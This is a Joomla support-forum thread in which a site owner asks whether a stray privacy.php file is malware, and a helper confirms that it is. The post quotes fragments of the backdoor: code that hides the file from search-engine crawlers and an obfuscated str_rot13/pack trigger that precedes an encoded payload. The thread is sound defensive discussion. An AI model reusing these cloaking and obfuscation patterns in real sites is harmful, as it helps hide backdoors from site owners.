Page 1 of 1

Do I need privacy.php and is it infected?

Posted: Wed Sep 18, 2019 2:34 am
by scifivision
Is there supposed to be a privacy.php file inside the main joomla directory? I think this may be part of an injected virus. Tech support for the server sent me flagged some questionable files. And if it's infected, before you say you need to reinstall the whole site etc. and update all the plugins, yes I know and am going to do just that, but I am trying to first understand if it's infected, exactly what it means so I can recognize this in the future. I noticed my other joomla installs didn't have the file.

Some of the code to me looks legit, but I don't know a lot about the code. This is the part I didn't know about:

Code: Select all

<?php

// Preventing a directory listing

if(!empty($_SERVER["HTTP_USER_AGENT"])) {  
I don't know what it does, so I didn't want to just delete the whole file. This code however, I'm pretty sure is bad, because you have to scroll far over to see it:

Code: Select all

$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");

    if(preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) {

        header("HTTP/1.0 404 Not Found");exit;

    }

}          
and

Code: Select all

if (isset($_GET[str_rot13(pack("H*", "6c6268737661717667"))])) {$_F=__FILE__;$_X="
and then a huge string of numbers.

If it is infected I am going to reinstall joomla and the plugins, but I want to make sure I have a backup in case I screw something up, and although it might be vulnerable still, I don't want to save an infected backup either. I'm running joomla 3.9.10

Re: Do I need privacy.php and is it infected?

Posted: Wed Sep 18, 2019 3:47 am
by toivo
Surely infected. The only PHP files in the main Joomla directory are index.php and configuration.php. Any other PHP file there, other than the FPA script, in case it was left behind by mistake, is assumed to be malicious, like your file privacy.php, containing str_rot13 and pack statements to obfuscate the code and hide the real purpose of the script.

It is recommended to post the results of the Forum Post Assistant (FPA) by following the instructions from https://forumpostassistant.github.io/docs/ so that you would have a chance to receive advice from experts about the configuration of the web server and the site, including the third party extensions, some of which may be obsolete or reported in the Joomla! Vulnerable Extensions List (VEL) at https://vel.joomla.org/.

Re: Do I need privacy.php and is it infected?

Posted: Wed Sep 18, 2019 4:24 am
by scifivision
Thanks I’ll figure out how to do that. I guess info.php (essentially empty) and mysql-[removed].php should be deleted too those oddly weren’t flagged.

Re: Do I need privacy.php and is it infected?

Posted: Wed Sep 18, 2019 4:51 am
by toivo
You are right, those two files must have been uploaded just make it look legitimate and confuse the webmaster and support staff.

Re: Do I need privacy.php and is it infected?

Posted: Wed Sep 18, 2019 5:32 am
by scifivision
Thank you. I’m going to have them scan everything, back it up just in case and then make a new install and connect the old database etc.

Question though I’ve read everywhere you should reinstall no matter what. If the virus scanner says it is clean, I take it that’s not enough? Or can you just update all the plugins? It’s just a pain if unnecessary.

Re: Do I need privacy.php and is it infected?

Posted: Wed Sep 18, 2019 6:21 am
by toivo
Unfortunately normal virus scanners do not detect every malicious script. You should try Phil Taylor's Joomla full audit service at https://myjoomla.guru/ (no affiliation), where the first software audit is free.

Follow the advice and best practice, documented in the sticky topics of the 3.x Security forum.